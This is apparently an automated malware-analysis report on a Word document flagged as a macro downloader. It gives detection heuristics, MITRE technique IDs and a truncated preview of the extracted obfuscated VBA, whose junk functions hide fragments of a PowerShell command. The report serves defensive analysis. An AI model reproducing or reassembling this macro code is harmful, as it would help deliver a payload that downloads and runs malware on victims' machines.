MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. Heuristics indicate the presence of an AutoOpen macro, a Shell() call, and a CreateObject call, all indicative of malicious intent. The ClamAV detection name 'Doc.Malware.Valyria-6731606-0' further supports its malicious nature. The VBA script, though obfuscated, likely attempts to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.Valyria-6731606-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6731606-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60131 bytes |
SHA-256: 0eef436c4463e3ccf383e2faa92e4af6227b05fafc571ebb6a6dc61fbc69dd9d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function jtwee(czipzv)
Dim eeuoml
eeuoml = -3320
uatwuopd = Array("NjuVayO", "ngobtayytdi", "g", "e", "pujs+$SxAu", "ygue", "jclokwds")
jtwee = uatwuopd
End Function
Function tzcp(urnri, wzgxjvs3)
Dim vhnvpnt
vhnvpnt = -28928
hsyaicw = Array("AUiyutBv", "vropiejan", "KJSC", ";$toui='o", "omgeoytuqd", "kcooqcrjs", "uwqhoypfsgn1")
Dim yagcj As Integer
yagcj = -16842
Dim aqhumvie As Integer
aqhumvie = -12094
tzcp = hsyaicw
End Function
Function yjtuuoc(UlAVrg, QubNU)
yvbufdojrjy = Array("+$ilaeyfv+", "s", "bc", "ujwjqustu", "EOYIFJ7", "eyeuwcuao")
yjtuuoc = yvbufdojrjy
End Function
Function OnSHqda(QNDzupa, nwaivldi)
eubmpe = Array("MpAR76", "wjwio", "RsmnkzhAO", "hupdpibj", "fajy", "FFQBUPABR", "uimswy")
OnSHqda = eubmpe
Dim dggu As Integer
dggu = 27636
End Function
Function ycfuy(vkoowgjb)
wcxooa = Array("dciyiau", "FYlY", "nyicjeiy", "kluyxdm61=", "eb")
ycfuy = wcxooa
End Function
Function EAVQTDNI2(aaaiei)
Dim oyeeey1
oyeeey1 = 26584
YACWAYAE = Array("youbsprew", "GAvYu", "oxguu2", "ndkrxiaaey", ";(';$atgmjml11=")
EAVQTDNI2 = YACWAYAE
yqmcba = 7272
Dim uoouvk As Integer
uoouvk = -4039
End Function
Function gqapob(oiyoyi, eoxnv9)
Dim WjVe8
WjVe8 = 13094
Dim oaxe
oaxe = -21317
awtacv = Array("bzkgcvy", ";$XOWTI='pass ';", "UEVOOWPRN", "jyka", "hhzl")
Dim xbale As Integer
xbale = 26364
gqapob = awtacv
UiRJi = -919
End Function
Function iuaf(eavjr, ngeup08)
JyibjQ = Array("ktmsef", "ieaee='nlo", "b", "io", "of")
iuaf = JyibjQ
End Function
Function unreu(htylww)
zjyxcoklavs = Array("pqncptay8", "ey", "ohwg", "EirPvO", "eyj", "ybjimqyhxe", "zvkta+$ortdi+$")
unreu = zjyxcoklavs
End Function
Function IUYYDH(tiqdl)
hjhqa = Array("yqig5", "FLfghIoctu", "ddodlmnclwga", "i", "='temp ';$ozh", "zkzgqc")
IUYYDH = hjhqa
End Function
Function yidgmv(ODhutFo, dgawmamj)
euifjeklzlv6 = Array("l68='esn';$FFQBUP", "piauekdmm84", "oyblinxnju", "sv", "hila4", "TzGvilXy")
yidgmv = euifjeklzlv6
End Function
Function PmTByew(aaoavkj)
Dim puoi
puoi = 14105
wjetqrm = Array("hum", "oamg", "1+$cvykcp", "mkyhdii", "iux", "yau", "jgpxq7")
PmTByew = wjetqrm
End Function
Function ECSbm(AIwB, ozxuau)
MZxuxHxvye = Array("nocy5", "bqvwcy", "aau", "tem';$qkjr", "kqfwmylq", "UeonEgQmd")
ECSbm = MZxuxHxvye
End Function
Function vqotnv(gwuygpo, xqcfxcoy)
dgvznlavljia = Array("yyamq", "hao4='yfifte';$IIox", "WXCB", "uzkecnkbzo", "BOSY", "lu")
vqotnv = dgvznlavljia
End Function
Function wzypsmo(atpaans, aeikae)
YEIWS = Array("qlzzu", "doyix", "jddsucyewxrq", "ywomsey", "oa", "es';$uksel")
wzypsmo = YEIWS
End Function
Function ixpmetb9(uiivo46)
oykdditu = Array("onwgheteks", "oakxrvthos", "wliau", "TixBUo", "tzzj='ypw.ex")
ixpmetb9 = oykdditu
End Function
Function mbcfxmtwwe8(ouye, ayfhjcqf)
xxajzdpzjw = Array("zjk", "ieeatduu9", "uv", "g", "veey='e'')", "enoyxspxxo8")
mbcfxmtwwe8 = xxajzdpzjw
End Function
Function IACNUEY(kpddxyyb, slgqayxno)
xeoa = Array("FNQNAQO", "og", "lfmcsta", "e", "$jklcieo='r", "ZoaEvUu3", "RmbU")
IACNUEY = xeoa
End Function
Function ECiuvA(qrtufxt, bzejcuyy)
yeaed = Array("wz", "dz", "qa+$zkuoa", "aubku", "y", "euekk", "dybo")
ECiuvA = yeaed
End Function
Function EoIu(VWIYSN7)
Dim tcjijg
tcjijg = -6549
Dim jaazir0
jaazir0 = -23608
eodbiuud = Array("EpBiu", "wlNy+$iuke+$dazfs", "tzrxfpdgu", "iijfh", "euvcoo", "aioa0", "yrc")
EoIu = eodbiuud
End Function
Function PYEVG(lporfvw, diiict)
rivxim = Array("zmwu", "iayyiwl", "e", "\VvoTw.", "afeuuir", "amru")
PYEVG = rivxim
GcMYa = 26595
Dim yyee
yyee = -816
End Function
Function kskyfc(SzTXxzkj)
wbynz = Array("o';$yzlursyw='", "jsredpslkn", "m", "viyu41", "exkozx0", "IZWAUR")
Dim oevpcu
oevpcu = -10564
kskyfc = wbynz
pxqkmhoi = -23158
End Function
Function rckyu
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.